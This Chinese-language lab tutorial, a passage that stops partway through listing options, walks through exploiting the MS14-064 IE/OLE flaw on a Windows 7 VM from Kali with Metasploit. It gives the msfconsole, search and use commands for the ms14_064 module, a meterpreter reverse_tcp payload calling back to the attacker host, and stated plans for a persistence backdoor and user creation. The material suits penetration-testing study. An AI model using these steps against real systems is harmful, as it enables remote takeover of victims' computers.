本实验实现1: 利用MS14-064漏洞,会生成一个网址,诱导用户点击,打开后,会直接连接到发起攻击的主机上,即可攻击成功。
本实验实现2:
一旦入侵成功,则拿到控制目标主机的部分权限,后通过persistence,在目标主机上生成一个固定的后门程序,以便后续不再通过MS14-064漏洞进行二次入侵,而是通过这个后门文件来入侵该主机。在向目标主机成功植入后门后,进行验证,重新通过已植入的后门程序,二次入侵目标主机,最终攻击成功。本实验实现3: 在kali控制win7后,实现创建用户的操作。
在VMware上建立两个虚拟机:win7和kali。
Kali:它是Linux发行版的操作系统,它拥有超过300个渗透测试工具,就不用自己再去找安装包,去安装到我们自己的电脑上了,毕竟自己从网上找到,也不安全。它甚至还集成了600多种黑客工具,很强大。
可以永久免费使用,基本上学黑客攻击必会用到这个系统。
靶机:Win7 64位 (IP: 192.168.10.45)–用ipconfig进行查询。
攻击机:Kali (IP:192.168.10.21)–用ifconfig进行查询。
1 、实验环境前提条件
win7中,关闭防火墙(“打开网络和共享中心”-“Windows防火墙”-“打开或关闭Windows防火墙”-均选择关闭选项)。
保证两个虚拟机是可以ping通的(尤其是在kali中去ping win7,看能否连通)。
$ping 192.168.10.45
2 、打开 Metasploit 渗透工具
Metasploit是一款开源的安全漏洞检测工具,msfconsole用于启动msf终端:
>msfconsole
结果: 成功进入,进入到"msf6>“的模式下
3 、查看需要利用的漏洞
搜索漏洞,编号为MS14-064。
MS14-064为Windows
OLE自动化阵列远程代码执行漏洞。当IE不作访问内存中的对象时,存在远程代码执行漏洞。OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,用户使用IE浏览器查看该网站时允许远程执行代码。
【 补充 :Windows系统漏洞微软的漏洞编号命名格式为:MS14-064;
MS Micosoft的缩写,固定格式;
14 表示年份,即2014年发布的漏洞;
064 表示顺序,即当年度发布的第64个漏洞。
>search ms14-064
结果: 可以看到返回了多条可利用的漏洞模块信息
4、尝试利用其中一个漏洞模块进行攻击
利用其中一个漏洞攻击模块-0模块,进行攻击,进入模块中( 注意 :必须是“_”,不是“-”,否则会报错)。
>use exploit/windows/browser/ms14_064_ole_code_execution
结果: 成功切换到这个模块之下–”msf6
exploit(windows/browser/ms14_064_ole_code_execution)>“
并提示“no payload configured,defaulting to
windows/meterpreter/reverse_tcp”–没有配置payload,默认为
windows/meterpreter/reverse_tcp
5、查看该漏洞模块所需的参数情况
进到这个漏洞模块之后,先查看该测试模块的参数情况。类似于你使用一软件,进行攻击,是不是需要先进行一些简单的参数配置啊,需要告诉软件,要向谁发起攻击吧,这是最最基本的,所以,要配置,就要先查看都可以配置哪些参数。
>show options
结果: 其中required显示的值为yes的,代表是必须要设置的项;显示的值为no的,代表是不必须要设置的项;
重点关注6个参数配置,需要设置哪个就设置哪个:
Payload (攻击载体-使用默认的windows/meterpreter/reverse_tcp即可) ;
SRVHOST (文件共享服务器-kali地址);
SRVPORT (文件共享服务器的端口-使用默认获取的端口即可);
LHOST (发起攻击的地址-kali地址);
LPORT (发起攻击的端口-使用默认获取的端口即可);
AllowPowershellPrompt